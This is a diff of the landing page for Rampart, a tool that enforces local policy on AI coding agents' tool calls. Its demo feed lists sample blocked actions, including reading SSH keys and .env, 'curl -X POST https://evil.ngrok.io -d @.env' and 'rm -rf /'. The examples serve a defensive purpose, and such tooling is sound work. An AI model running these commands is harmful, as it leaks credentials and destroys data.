+<section class="section tight" id="watch">
+    <div class="container reveal">
+        <div class="watch-shell panel">
+            <div class="watch-bar">
+                <span class="dot red"></span><span class="dot yellow"></span><span class="dot green"></span>
+                <span class="watch-title">rampart watch · enforce mode · standard.yaml</span>
             </div>
-            <div class="terminal-body">
-                <div class="terminal-header" id="profile-header">RAMPART WATCH — enforce mode — standard.yaml</div>
-                <div style="margin-bottom: 4px; color: #58a6ff; font-size: 0.78rem;">LIVE FEED</div>
-                <div class="watch-rows" id="watch-rows">
-                </div>
-                <div class="terminal-footer" id="profile-footer">
-                </div>
+            <div class="watch-rows">
+                <div class="watch-row deny"><span class="icon">●</span><span class="time">21:03:41</span><span class="tool">read</span><span class="cmd">~/.ssh/id_ed25519</span><span class="tag">[no-ssh-keys]</span></div>
+                <div class="watch-row deny"><span class="icon">●</span><span class="time">21:03:42</span><span class="tool">resp</span><span class="cmd">read .env → blocked: response contained AWS_SECRET_ACCESS_KEY</span><span class="tag">[block-credential-leak]</span></div>
+                <div class="watch-row allow"><span class="icon">✔</span><span class="time">21:03:43</span><span class="tool">exec</span><span class="cmd">git status</span><span class="tag">[-]</span></div>
+                <div class="watch-row allow"><span class="icon">✔</span><span class="time">21:03:44</span><span class="tool">exec</span><span class="cmd">npm install express</span><span class="tag">[-]</span></div>
+                <div class="watch-row allow"><span class="icon">✔</span><span class="time">21:03:45</span><span class="tool">exec</span><span class="cmd">go test ./...</span><span class="tag">[-]</span></div>
+                <div class="watch-row deny"><span class="icon">●</span><span class="time">21:03:47</span><span class="tool">exec</span><span class="cmd">curl -X POST https://evil.ngrok.io -d @.env</span><span class="tag">[block-exfil]</span></div>
+                <div class="watch-row ask"><span class="icon">ASK</span><span class="time">21:03:48</span><span class="tool">exec</span><span class="cmd">kubectl apply -f deploy.yaml</span><span class="tag">[ask]</span></div>
+                <div class="watch-row deny"><span class="icon">●</span><span class="time">21:03:50</span><span class="tool">exec</span><span class="cmd">rm -rf /</span><span class="tag">[block-destructive]</span></div>
             </div>
+            <div class="watch-footer">STATS: 8 total · 3 allow · 4 deny/redact · 1 ask</div>
         </div>
     </div>
 </section>
 
-<section class="stats-band" aria-label="Rampart by the numbers">
-    <div class="container">
+<section class="section tight">
+    <div class="container reveal">
         <div class="stats-row">
-            <div class="stat-card"><span class="stat-num">8µs</span><span class="stat-label">policy eval</span></div>
-            <div class="stat-card"><span class="stat-num">40+</span><span class="stat-label">built-in rules</span></div>
-            <div class="stat-card"><span class="stat-num">95%</span><span class="stat-label">pattern matched</span></div>
-            <div class="stat-card"><span class="stat-num">0</span><span class="stat-label">cloud deps</span></div>
-            <div class="stat-card"><span class="stat-num">4</span><span class="stat-label">native agents</span></div>
+            <div class="stat-card interactive"><span class="stat-num">8µs</span><span class="stat-label">example deny decision</span></div>
+            <div class="stat-card interactive"><span class="stat-num">47</span><span class="stat-label">rules in standard.yaml</span></div>
+            <div class="stat-card interactive"><span class="stat-num">local</span><span class="stat-label">audit + policy evaluation</span></div>
+            <div class="stat-card interactive"><span class="stat-num">4</span><span class="stat-label">native agent integrations</span></div>
         </div>
     </div>
 </section>
 
-<!-- Positioning: Sandbox vs Rampart -->
-<section class="positioning" style="padding: 100px 0;">
-    <div class="container">
-        <div class="section-label">A different approach</div>
-        <h2 class="section-title">Your agent needs real access to do real work.<br>It just shouldn't have access to <em>everything</em>.</h2>
-        <p class="section-desc">Sandboxes are useful, but they often block <code>npm install</code>, <code>git clone</code>, and the API calls your agent needs to finish the job. Rampart keeps the workflow moving and blocks credential reads, exfiltration, and destructive commands.</p>
-        <div class="pos-grid">
-            <div class="pos-card negative">
-                <div class="label">Sandbox approach</div>
-                <h3>Lock everything, allow a few things</h3>
-                <p>Agent can't install deps, run tests, or hit your staging API. Secure, but you fight the sandbox to get work done.</p>
-                <pre><span style="color:#484f58;">$ sandbox --allow ./project -- agent</span>
-<span style="color:#ef4444;">✗</span> npm install        <span style="color:#484f58;"># denied</span>
-<span style="color:#ef4444;">✗</span> pytest --db-url ... <span style="color:#484f58;"># denied</span>
-<span style="color:#ef4444;">✗</span> curl staging.api    <span style="color:#484f58;"># denied</span></pre>
-            </div>
-            <div class="pos-card positive">
-                <div class="label">Rampart approach</div>
-                <h3>Allow everything, block the dangerous stuff</h3>
-                <p>Agent works normally. Rampart only intervenes on credential access, exfiltration, and destructive commands.</p>
-                <pre>$ rampart setup claude-code
-<span style="color:#22c55e;">✔</span> npm install        <span style="color:#484f58;"># allowed</span>
-<span style="color:#22c55e;">✔</span> pytest --db-url ... <span style="color:#484f58;"># allowed</span>
-<span style="color:#FF6392;">✗</span> cat ~/.ssh/id_rsa   <span style="color:#484f58;"># denied</span></pre>
-            </div>
-        </div>
-    </div>
-</section>
-
-<!-- Mechanics -->
-<section class="mechanics">
-    <div class="container mechanics-grid">
-        <div>
-            <div class="section-label">How enforcement works</div>
+<section class="section">
+    <div class="container story-grid">
+        <div class="story-copy reveal">
+            <div class="section-label">A seatbelt, not a cage</div>
             <h2 class="section-title">Rampart does not ask the agent to behave.</h2>
-            <p class="section-desc">It sits in the execution path. Every command, file read, network request, and MCP call is evaluated before it runs. Most requests pass in microseconds. Risky ones are denied, held for approval, or redacted before secrets reach the model.</p>
+            <p class="section-desc">It sits in the execution path. Every command, file read, network request, and MCP call is evaluated before it runs. Safe work stays fast. Risky work is denied, held for approval, or redacted before secrets ever reach the model.</p>
+            <div class="story-points">
+                <div class="story-point interactive"><h3>Allow normal development</h3><p><code>npm install</code>, <code>go test ./...</code>, and <code>git status</code> stay fast because common safe actions are pattern matched locally.</p></div>
+                <div class="story-point interactive"><h3>Ask for risky actions</h3><p>Rules with <code>action: ask</code> hold commands like <code>kubectl apply</code> until a human decides.</p></div>
+                <div class="story-point interactive"><h3>Block secrets on the way in or out</h3><p>If a file read would put credentials into the agent’s context window, the response is blocked before the model ever sees it.</p></div>
+            </div>
         </div>
-        <div class="flow-panel">
-            <div class="flow-row"><span class="flow-label">request</span><span><span class="flow-main">Agent asks for a tool call</span><span class="flow-sub">exec · file.read · network · MCP</span></span><span class="flow-decision">normalize</span></div>
-            <div class="flow-row"><span class="flow-label">policy</span><span><span class="flow-main">YAML rules evaluate locally</span><span class="flow-sub">scope, command, path, URL, response patterns</span></span><span class="flow-decision allow">8µs</span></div>
-            <div class="flow-row"><span class="flow-label">decision</span><span><span class="flow-main">Allow, ask, deny, or redact</span><span class="flow-sub">normal dev continues; risky actions pause or stop</span></span><span class="flow-decision ask">ask</span></div>
-            <div class="flow-row"><span class="flow-label">audit</span><span><span class="flow-main">Hash-chained JSONL record</span><span class="flow-sub">every allow, ask, deny, and redaction is written locally</span></span><span class="flow-decision deny">verify</span></div>
-        </div>
-    </div>
-</section>
-
-<!-- Seatbelt -->
-<section class="features" style="padding-top:60px;">
-    <div class="container">
-        <div class="section-label">A seatbelt, not a cage</div>
-        <h2 class="section-title">Your agent can still build.</h2>
-        <p class="section-desc">It can install dependencies, run tests, clone repos, and call the APIs you allow. It just cannot quietly read <code>~/.ssh/id_rsa</code>, post <code>.env</code> to a tunnel, or rewrite its own policy.</p>
-        <div class="example-grid">
-            <div class="example-card"><div class="example-kicker">Allow</div><h3>Normal development keeps moving</h3><p><code>npm install</code>, <code>go test ./...</code>, and <code>git status</code> stay fast because common safe actions are pattern-matched locally.</p></div>
-            <div class="example-card"><div class="example-kicker">Ask</div><h3>Risky production actions pause</h3><p>Rules with <code>action: ask</code> hold commands like <code>kubectl apply</code> until a human decides.</p></div>
-            <div class="example-card"><div class="example-kicker">Deny</div><h3>Secrets and destruction stop cold</h3><p>Credential reads, exfiltration patterns, destructive shell commands, and policy self-modification are blocked before execution.</p></div>
-        </div>
-    </div>
-</section>
-
-<!-- Response scanning -->
-<section class="response-section">
-    <div class="container response-layout">
-        <div>
-            <div class="section-label">Response scanning</div>
-            <h2 class="section-title">Most tools stop at the request. Rampart also scans the response.</h2>
-            <p class="section-desc">If a file read would put credentials into the agent's context window, the response is blocked before the model ever sees it. That matters when the dangerous thing is not the read itself, but what comes back.</p>
-        </div>
-        <div class="response-visual">
-            <div class="response-step"><div class="response-num">01</div><div><strong>Agent reads <code>.env</code></strong><span>The file access is normalized as a tool response, not just a path.</span></div></div>
-            <div class="response-step"><div class="response-num">02</div><div><strong>Credential pattern detected</strong><span><code>AWS_SECRET_ACCESS_KEY</code>, private keys, tokens, and similar secrets match local policy.</span></div></div>
-            <div class="response-step"><div class="response-num">03</div><div><strong>Response blocked before context</strong><span>The agent receives the policy decision, not the secret value.</span></div></div>
+        <div class="story-flow-layout">
+            <div class="story-panel-wrap">
+                <div class="story-panel panel reveal">
+                    <div class="flow-panel" id="flow-panel">
+                        <div class="flow-row active" data-flow-row="0"><span class="flow-label">request</span><span><span class="flow-main">Agent asks for a tool call</span><span class="flow-sub">exec · file.read · network · MCP</span></span><span class="flow-chip">normalize</span></div>
+                        <div class="flow-row" data-flow-row="1"><span class="flow-label">policy</span><span><span class="flow-main">YAML rules evaluate locally</span><span class="flow-sub">scope, command, path, URL, response patterns</span></span><span class="flow-chip allow">8µs</span></div>
+                        <div class="flow-row" data-flow-row="2"><span class="flow-label">decision</span><span><span class="flow-main">Allow, ask, deny, or redact</span><span class="flow-sub">normal dev continues; risky actions pause or stop</span></span><span class="flow-chip ask">ask</span></div>
+                        <div class="flow-row" data-flow-row="3"><span class="flow-label">audit</span><span><span class="flow-main">Hash-chained JSONL record</span><span class="flow-sub">every allow, ask, deny, and redaction is written locally</span></span><span class="flow-chip deny">verify</span></div>
+                    </div>
+                    <div class="flow-status"><span>stage <strong id="flow-stage">request</strong></span><span id="flow-detail">tool call normalized before policy evaluation</span></div>
+                </div>
+            </div>
+            <div class="flow-steps" id="flow-steps">
+                <div class="flow-step" data-flow-step="0"><div class="flow-step-copy"><div class="flow-step-number">01 · request</div><h3>The agent asks for a real tool.</h3><p>This is the point where most “guardrails” stop being trustworthy. Rampart starts there instead.</p></div></div>
+                <div class="flow-step" data-flow-step="1"><div class="flow-step-copy"><div class="flow-step-number">02 · policy</div><h3>Most decisions happen in microseconds.</h3><p>Pattern matching handles the boring 95% instantly. The common case should feel invisible.</p></div></div>
+                <div class="flow-step" data-flow-step="2"><div class="flow-step-copy"><div class="flow-step-number">03 · decision</div><h3>The dangerous stuff gets stopped, not politely suggested against.</h3><p>Secrets, exfiltration, destructive commands, and approval-gated actions get enforced before execution.</p></div></div>
+                <div class="flow-step" data-flow-step="3"><div class="flow-step-copy"><div class="flow-step-number">04 · audit</div><h3>You can see exactly what your agent tried to do.</h3><p>Hash-chained JSONL gives you a tamper-evident record you can search, verify, and use to generate better policy.</p></div></div>
+            </div>
         </div>
     </div>
 </section>
 
-<!-- Integrations -->
-<section class="integrations-section">
-    <div class="container">
+<section class="section">
+    <div class="container reveal">
         <div class="section-label">Works with your agent</div>
         <h2 class="section-title">Claude Code, Codex CLI, Cline, OpenClaw, MCP.</h2>
         <p class="section-desc">Use the native setup where Rampart knows the agent. Use wrapping or the MCP proxy everywhere else.</p>
-        <div class="integration-table">
+        <div class="integrations-grid">
             <div class="integration-row header"><span>Agent</span><span>Setup</span><span>Enforcement path</span><span>Status</span></div>
-            <div class="integration-row"><span class="integration-agent">Claude Code</span><span class="integration-code">rampart setup claude-code</span><span class="integration-path">hooks + bridge</span><span class="integration-status">native</span></div>
-            <div class="integration-row"><span class="integration-agent">Codex CLI</span><span class="integration-code">rampart setup codex</span><span class="integration-path">wrapper + preload</span><span class="integration-status">native</span></div>
-            <div class="integration-row"><span class="integration-agent">Cline</span><span class="integration-code">rampart setup cline</span><span class="integration-path">hooks</span><span class="integration-status">native</span></div>
-            <div class="integration-row"><span class="integration-agent">OpenClaw</span><span class="integration-code">rampart setup openclaw --plugin</span><span class="integration-path">plugin + shim</span><span class="integration-status">native</span></div>
-            <div class="integration-row"><span class="integration-agent">Any agent</span><span class="integration-code">rampart wrap -- &lt;cmd&gt;</span><span class="integration-path">shim</span><span class="integration-status">universal</span></div>
-            <div class="integration-row"><span class="integration-agent">MCP servers</span><span class="integration-code">rampart mcp -- &lt;server&gt;</span><span class="integration-path">proxy</span><span class="integration-status">universal</span></div>
+            <div class="integration-row interactive"><span class="integration-agent">Claude Code</span><span class="integration-code">rampart setup claude-code</span><span class="integration-path">hooks + bridge</span><span class="integration-status">native</span></div>
+            <div class="integration-row interactive"><span class="integration-agent">Codex CLI</span><span class="integration-code">rampart setup codex</span><span class="integration-path">wrapper + preload</span><span class="integration-status">native</span></div>
+            <div class="integration-row interactive"><span class="integration-agent">Cline</span><span class="integration-code">rampart setup cline</span><span class="integration-path">hooks</span><span class="integration-status">native</span></div>
+            <div class="integration-row interactive"><span class="integration-agent">OpenClaw</span><span class="integration-code">rampart setup openclaw --plugin</span><span class="integration-path">plugin + shim</span><span class="integration-status">native</span></div>
+            <div class="integration-row interactive"><span class="integration-agent">Any agent</span><span class="integration-code">rampart wrap -- &lt;cmd&gt;</span><span class="integration-path">shim</span><span class="integration-status">universal</span></div>
+            <div class="integration-row interactive"><span class="integration-agent">MCP servers</span><span class="integration-code">rampart mcp -- &lt;server&gt;</span><span class="integration-path">proxy</span><span class="integration-status">universal</span></div>
         </div>
     </div>
 </section>
 
-<!-- YAML -->
-<section class="yaml-section">
+<section class="section">
     <div class="container yaml-layout">
-        <div>
+        <div class="reveal">
             <div class="section-label">Policy as code</div>
-            <h2 class="section-title">It's just YAML.</h2>
-            <p class="section-desc">No SDK, no cloud console, no proprietary rule builder. Use the built-in profile, or write the exact rule you want reviewed before a tool call runs.</p>
-        </div>
-        <div class="yaml-block">
-            <div class="yaml-bar">
-                <span class="yaml-dot"></span><span class="yaml-dot"></span><span class="yaml-dot"></span>
-                <span class="yaml-title">~/.rampart/policies/standard.yaml</span>
+            <h2 class="section-title">It’s just YAML.</h2>
+            <p class="section-desc">No SDK. No cloud console. No proprietary rule builder. Use the built-in profile, or write the exact rule you want reviewed before a tool call runs.</p>
+            <div class="yaml-notes">
+                <div class="yaml-note interactive"><strong>You set the rules, or use ours.</strong><span>The default profile lives at <code>~/.rampart/policies/standard.yaml</code> with 47 rules.</span></div>
+                <div class="yaml-note interactive"><strong>Policy modifications must be made by a human.</strong><span>Agents should not be quietly rewriting the thing enforcing them.</span></div>
+                <div class="yaml-note interactive"><strong>Hash-chained JSONL audit. Tamper-evident.</strong><span>See exactly what your agent does, then generate rules from the audit log.</span></div>
             </div>
+        </div>
+        <div class="yaml-block panel reveal">
+            <div class="yaml-bar"><span class="dot red"></span><span class="dot yellow"></span><span class="dot green"></span><span class="yaml-title">~/.rampart/policies/standard.yaml</span></div>
             <pre><code><span class="yaml-k">version</span>: <span class="yaml-s">"1"</span>
 <span class="yaml-k">policies</span>:
   - <span class="yaml-k">name</span>: <span class="yaml-s">block-credential-leak</span>
@@ -1023,84 +1293,69 @@
     </div>
 </section>
 
-<!-- Ecosystem -->
-<section class="ecosystem-section">
-    <div class="container">
+<section class="section tight">
+    <div class="container reveal">
         <div class="section-label">Ecosystem</div>
         <h2 class="section-title">Rampart blocks. Snare catches.</h2>
         <div class="ecosystem-card">
-            <div class="ecosystem-half"><h3>Rampart</h3><p>Stops unsafe agent actions before they run. It protects the execution path: commands, file reads, network calls, and MCP tools.</p></div>
-            <div class="ecosystem-half"><h3>Snare</h3><p>Plants credential canaries so you know when something escaped anyway. It tells you when your assumptions failed.</p></div>
+            <div class="ecosystem-half panel interactive"><h3>Rampart</h3><p>Stops unsafe agent actions before they run. It protects the execution path: commands, file reads, network calls, and MCP tools.</p></div>
+            <div class="ecosystem-link">paired</div>
+            <div class="ecosystem-half panel interactive"><h3>Snare</h3><p>Plants credential canaries so you know when something escaped anyway. It tells you when your assumptions failed.</p></div>
         </div>
-        <div class="ecosystem-line">One blocks the action. The other proves when a secret was used.</div>
+        <p style="margin-top:18px;color:var(--text-dim);">One blocks the action. The other proves when a secret was used.</p>
     </div>
 </section>
 
-<!-- Principles -->
-<section class="principles-section">
-    <div class="container">
-        <div class="principles-card">
-            <div class="section-label">Design principle</div>
-            <div class="principles-line"><strong>Built for people who actually run agents.</strong> Normal development should stay fast. Credentials, exfiltration, destructive commands, and policy tampering should not get a free pass.</div>
-            <div class="principles-meta">Local-first. Fail open for routine work. Human-owned policy changes.</div>
+<section class="section install-section" id="install">
+    <div class="container reveal">
+        <div class="section-label">Quickstart</div>
+        <h2 class="section-title">Start protecting your agents.</h2>
+        <p class="section-desc" style="margin:0 auto;">Install locally. No account, no API key, no cloud dependency.</p>
+
+        <div class="install-tabs">
+            <button id="tab-unix" class="install-tab active" onclick="switchTab('unix')">macOS / Linux</button>
+            <button id="tab-win" class="install-tab" onclick="switchTab('win')">Windows</button>
+        </div>
+
+        <div id="panel-unix" class="install-panel">
+            <div class="install-card panel">
+                <div class="install-inline" onclick="copyCode(this)" title="Click to copy" style="width:100%; justify-content:space-between;">
+                    <span><span class="prompt">$</span> curl -fsSL https://rampart.sh/install | bash</span>
+                    <span class="copy-hint">click to copy</span>
+                </div>
+                <p style="margin-top:12px;color:var(--text-dim);font-size:0.86rem;">Installs to <code>~/.local/bin</code> by default. Usually no sudo required.</p>
+                <div class="install-links">
+                    <span style="color:var(--text-dim);">Also available via</span>
+                    <a href="https://docs.rampart.sh/getting-started/installation/#homebrew-macos-linux">Homebrew</a>
+                    <a href="https://docs.rampart.sh/getting-started/installation/#go-install">Go install</a>
+                    <a href="https://github.com/peg/rampart/releases">Binary</a>
+                </div>
+            </div>
+        </div>
+
+        <div id="panel-win" class="install-panel" hidden>
+            <div class="install-card panel">
+                <div class="install-inline" onclick="copyCode(this)" title="Click to copy" style="width:100%; justify-content:space-between;">
+                    <span><span class="prompt">PS&gt;</span> irm https://rampart.sh/install.ps1 | iex</span>
+                    <span class="copy-hint">click to copy</span>
+                </div>
+                <p style="margin-top:12px;color:var(--text-dim);font-size:0.86rem;">Installs to <code>~\.rampart\bin</code>. No admin rights required.</p>
+                <div class="install-links">
+                    <span style="color:var(--text-dim);">Also available via</span>
+                    <a href="https://docs.rampart.sh/getting-started/installation/#go-install">Go install</a>
+                    <a href="https://github.com/peg/rampart/releases">Binary</a>
+                </div>
+            </div>
+        </div>
+
+        <div class="setup-box panel">
+            <p style="color:var(--heading);font-weight:700;margin-bottom:12px;text-align:center;">Then connect your agent:</p>
+            <pre><span style="color:var(--accent)">$</span> rampart setup          <span style="color:var(--text-dim)"># auto-detects all your agents</span>
+<span style="color:var(--text-dim)"># or target one: rampart setup claude-code / codex / cline / openclaw --plugin</span></pre>
         </div>
     </div>
 </section>
 
-<!-- Install -->
-<section class="install" id="install">
-    <div class="container">
-        <h2 class="section-title">Start protecting your <span style="color:var(--accent)">agents</span></h2>
-        <p class="sub">Install in seconds. No account, no API key, no cloud dependency.</p>
-
-        <!-- OS tabs -->
-        <div style="display:flex; justify-content:center; gap:0; margin-bottom:20px; max-width:560px; margin-left:auto; margin-right:auto;">
-            <button id="tab-unix" onclick="switchTab('unix')" style="flex:1; padding:8px 0; font-size:0.85rem; font-weight:600; border:1px solid var(--accent); border-right:none; border-radius:6px 0 0 6px; background:var(--accent); color:#fff; cursor:pointer;">macOS / Linux</button>
-            <button id="tab-win" onclick="switchTab('win')" style="flex:1; padding:8px 0; font-size:0.85rem; font-weight:600; border:1px solid var(--accent); border-radius:0 6px 6px 0; background:transparent; color:var(--accent); cursor:pointer;">Windows</button>
-        </div>
-
-        <!-- macOS / Linux -->
-        <div id="panel-unix" style="max-width:560px; margin:0 auto;">
-            <div class="install-cmd" onclick="copyCode(this)" title="Click to copy">
-                <span style="color:var(--accent);">$</span> curl -fsSL https://rampart.sh/install | bash
-                <span class="install-copy-hint">click to copy</span>
-            </div>
-            <p style="font-size:0.78rem; color:var(--text-dim); margin:8px 0 16px;">Installs to <code>~/.local/bin</code>. No sudo required.</p>
-            <div style="display:flex; gap:16px; justify-content:center; font-size:0.82rem;">
-                <span style="color:var(--text-dim);">Also available via</span>
-                <a href="https://docs.rampart.sh/getting-started/installation/" style="color:var(--accent); text-decoration:none;">Homebrew</a>
-                <span style="color:var(--border-light);">·</span>
-                <a href="https://docs.rampart.sh/getting-started/installation/" style="color:var(--accent); text-decoration:none;">Go install</a>
-                <span style="color:var(--border-light);">·</span>
-                <a href="https://github.com/peg/rampart/releases" style="color:var(--accent); text-decoration:none;">Binary</a>
-            </div>
-        </div>
-
-        <!-- Windows -->
-        <div id="panel-win" style="max-width:560px; margin:0 auto; display:none;">
-            <div class="install-cmd" onclick="copyCode(this)" title="Click to copy">
-                <span style="color:var(--accent);">PS&gt;</span> irm https://rampart.sh/install.ps1 | iex
-                <span class="install-copy-hint">click to copy</span>
-            </div>
-            <p style="font-size:0.78rem; color:var(--text-dim); margin:8px 0 16px;">Installs to <code>~\.rampart\bin</code>. No admin rights required.</p>
-            <div style="display:flex; gap:16px; justify-content:center; font-size:0.82rem;">
-                <span style="color:var(--text-dim);">Also available via</span>
-                <a href="https://docs.rampart.sh/getting-started/installation/" style="color:var(--accent); text-decoration:none;">Go install</a>
-                <span style="color:var(--border-light);">·</span>
-                <a href="https://github.com/peg/rampart/releases" style="color:var(--accent); text-decoration:none;">Binary</a>
-            </div>
-        </div>
-
-        <div style="margin-top:32px; max-width:560px; margin-left:auto; margin-right:auto; text-align:left;">
-            <p style="font-size:0.9rem; color:var(--heading); font-weight:600; margin-bottom:12px; text-align:center;">Then connect your agent:</p>
-            <pre style="background:var(--surface); border:1px solid var(--border); border-radius:10px; padding:16px 20px; font-family:var(--mono); font-size:0.82rem; line-height:2; color:var(--text-bright); margin:0; overflow-x:auto;"><span style="color:var(--accent);">$</span> rampart setup          <span style="color:var(--text-dim);"># auto-detects all your agents</span>
-<span style="color:var(--text-dim);"># or target one: rampart setup claude-code / codex / cline / openclaw --plugin</span></pre>
-        </div>
-
-    </div>
-</section>
-
-<!-- Footer -->
 <footer>
     <div class="container">
         <div class="footer-links">
@@ -1118,142 +1373,105 @@
 
 <script>
 function switchTab(os) {
-    document.getElementById('panel-unix').style.display = os === 'unix' ? 'block' : 'none';
-    document.getElementById('panel-win').style.display  = os === 'win'  ? 'block' : 'none';
-    var u = document.getElementById('tab-unix'), w = document.getElementById('tab-win');
-    u.style.background = os === 'unix' ? 'var(--accent)' : 'transparent';
-    u.style.color      = os === 'unix' ? '#fff' : 'var(--accent)';
-    w.style.background = os === 'win'  ? 'var(--accent)' : 'transparent';
-    w.style.color      = os === 'win'  ? '#fff' : 'var(--accent)';
+    var unix = document.getElementById('panel-unix');
+    var win = document.getElementById('panel-win');
+    var tabUnix = document.getElementById('tab-unix');
+    var tabWin = document.getElementById('tab-win');
+    var showUnix = os === 'unix';
+    unix.hidden = !showUnix;
+    win.hidden = showUnix;
+    tabUnix.classList.toggle('active', showUnix);
+    tabWin.classList.toggle('active', !showUnix);
 }
 if (navigator.userAgent.indexOf('Windows') !== -1) switchTab('win');
 
-// GitHub stars
+function copyCode(el) {
+    var text = el.textContent.replace(/^\s*\$\s*/, '').replace(/^PS>\s*/, '').replace(/click to copy/i, '').trim();
+    var hint = el.querySelector('.copy-hint');
+    navigator.clipboard.writeText(text).then(function() {
+        if (!hint) return;
+        hint.textContent = 'copied!';
+        hint.style.color = 'var(--accent)';
+        hint.style.borderColor = 'var(--accent)';
+        setTimeout(function() {
+            hint.textContent = 'click to copy';
+            hint.style.color = '';
+            hint.style.borderColor = '';
+        }, 1800);
+    }).catch(function() {});
+}
+
 (function() {
     var el = document.getElementById('star-count');
     if (!el) return;
-    var c = localStorage.getItem('rampart-stars'), t = localStorage.getItem('rampart-stars-at');
-    if (c && t && Date.now() - Number(t) < 3600000) { el.textContent = c; return; }
+    var c = localStorage.getItem('rampart-stars');
+    var t = localStorage.getItem('rampart-stars-at');
+    if (c && t && Date.now() - Number(t) < 3600000) {
+        el.textContent = c + ' GitHub stars';
+        return;
+    }
     fetch('https://api.github.com/repos/peg/rampart')
         .then(function(r) { return r.json(); })
         .then(function(d) {
             if (d.stargazers_count != null) {
-                el.textContent = d.stargazers_count;
+                el.textContent = d.stargazers_count + ' GitHub stars';
                 localStorage.setItem('rampart-stars', d.stargazers_count);
                 localStorage.setItem('rampart-stars-at', Date.now());
             }
-        }).catch(function() {});
+        })
+        .catch(function() {});
 })();
 
-function copyCode(el) {
-    // Get text content, strip the prompt prefix and copy hint
-    var text = el.textContent.replace(/^\s*\$\s*/, '').replace(/^PS>\s*/, '').replace(/click to copy/i, '').trim();
-    var hint = el.querySelector('.install-copy-hint');
-    navigator.clipboard.writeText(text).then(function() {
-        if (hint) {
-            hint.textContent = 'copied!';
-            hint.style.color = 'var(--accent)';
-            hint.style.borderColor = 'var(--accent)';
-            setTimeout(function() { hint.textContent = 'click to copy'; hint.style.color = ''; hint.style.borderColor = ''; }, 2000);
-        }
-    });
-}
+(function() {
+    var reveals = document.querySelectorAll('.reveal');
+    var observer = new IntersectionObserver(function(entries) {
+        entries.forEach(function(entry) {
+            if (entry.isIntersecting) entry.target.classList.add('reveal-visible');
+        });
+    }, { threshold: 0.14 });
+    reveals.forEach(function(node) { observer.observe(node); });
+})();
 
-// copyInstall now uses the unified copyCode function
-var copyInstall = copyCode;
-
-// Profile-based animated terminal
-var profiles = {
-    standard: {
-        header: "RAMPART WATCH — enforce mode — standard.yaml",
-        desc: "Default profile. Blocks the dangerous stuff, allows everything else.",
-        rows: [
-            { cls: "watch-deny",  icon: "●",  time: "21:03:41", tool: "read", cmd: "~/.ssh/id_ed25519", tag: "[no-ssh-keys]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:42", tool: '<span style="color:var(--cyan);">resp</span>', cmd: 'read .env → <span style="color:var(--red);font-style:italic;">blocked: response contained AWS_SECRET_ACCESS_KEY</span>', tag: "[block-credential-leak]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:43", tool: "exec", cmd: "git status", tag: "[-]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:44", tool: "exec", cmd: "npm install express", tag: "[-]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:45", tool: "exec", cmd: "go test ./...", tag: "[-]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:47", tool: "exec", cmd: "curl -X POST https://evil.ngrok.io -d @.env", tag: "[block-exfil]" },
-            { cls: "watch-ask",   icon: "ASK", time: "21:03:48", tool: "exec", cmd: "kubectl apply -f deploy.yaml", tag: "[ask]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:50", tool: "exec", cmd: "rm -rf /", tag: "[block-destructive]" }
-        ],
-        footer: "STATS: 8 total | 3 allow | 3 deny | 1 ask | 1 resp-block"
-    },
-    paranoid: {
-        header: "RAMPART WATCH — enforce mode — paranoid.yaml",
-        desc: "Deny-by-default. Only explicitly allowed commands get through.",
-        rows: [
-            { cls: "watch-allow", icon: "✔",  time: "21:03:41", tool: "exec", cmd: "git status", tag: "[dev-tools-allowlist]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:42", tool: "exec", cmd: "go build ./...", tag: "[dev-tools-allowlist]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:43", tool: "exec", cmd: "npm install express", tag: "[default-deny]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:44", tool: "exec", cmd: "curl https://api.github.com", tag: "[default-deny]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:45", tool: "read", cmd: "src/main.go", tag: "[dev-tools-allowlist]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:46", tool: "read", cmd: "~/.ssh/id_ed25519", tag: "[default-deny]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:47", tool: "exec", cmd: "pip install requests", tag: "[default-deny]" },
-            { cls: "watch-deny",  icon: "●",  time: "21:03:48", tool: "write", cmd: "/etc/hosts", tag: "[default-deny]" }
-        ],
-        footer: "STATS: 8 total | 3 allow | 5 deny — only allowlisted commands pass"
-    },
-    monitor: {
-        header: "RAMPART WATCH — monitor mode — observe before enforcing",
-        desc: "Watch everything without blocking. Use the audit log to generate rules.",
-        rows: [
-            { cls: "watch-allow", icon: "✔",  time: "21:03:41", tool: "exec", cmd: "git clone https://github.com/peg/rampart", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:42", tool: "exec", cmd: "npm install", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:43", tool: "read", cmd: "~/.ssh/id_ed25519", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:44", tool: "exec", cmd: "go test ./...", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:45", tool: "exec", cmd: "curl -X POST https://evil.ngrok.io -d @.env", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:46", tool: "exec", cmd: "rm -rf /tmp/build", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:47", tool: "read", cmd: ".env", tag: "[logged]" },
-            { cls: "watch-allow", icon: "✔",  time: "21:03:48", tool: "exec", cmd: "rampart init --from-audit", tag: "[logged]" }
-        ],
-        footer: 'STATS: 8 total | 8 logged | 0 blocked — run <span style="color:var(--accent);">rampart init --from-audit</span> to generate rules'
+(function() {
+    var root = document.documentElement;
+    var ticking = false;
+    function update() {
+        root.style.setProperty('--scroll', String(window.scrollY || 0));
+        ticking = false;
     }
-};
+    window.addEventListener('scroll', function() {
+        if (!ticking) {
+            requestAnimationFrame(update);
+            ticking = true;
+        }
+    }, { passive: true });
+    update();
+})();
 
-var animTimers = [];
-function switchProfile(key, el) {
-    // Update tabs
-    var tabs = document.querySelectorAll('.policy-tab');
-    tabs.forEach(function(t) { t.classList.remove('active'); });
-    if (el) el.classList.add('active');
-
-    // Clear previous animation timers
-    animTimers.forEach(clearTimeout);
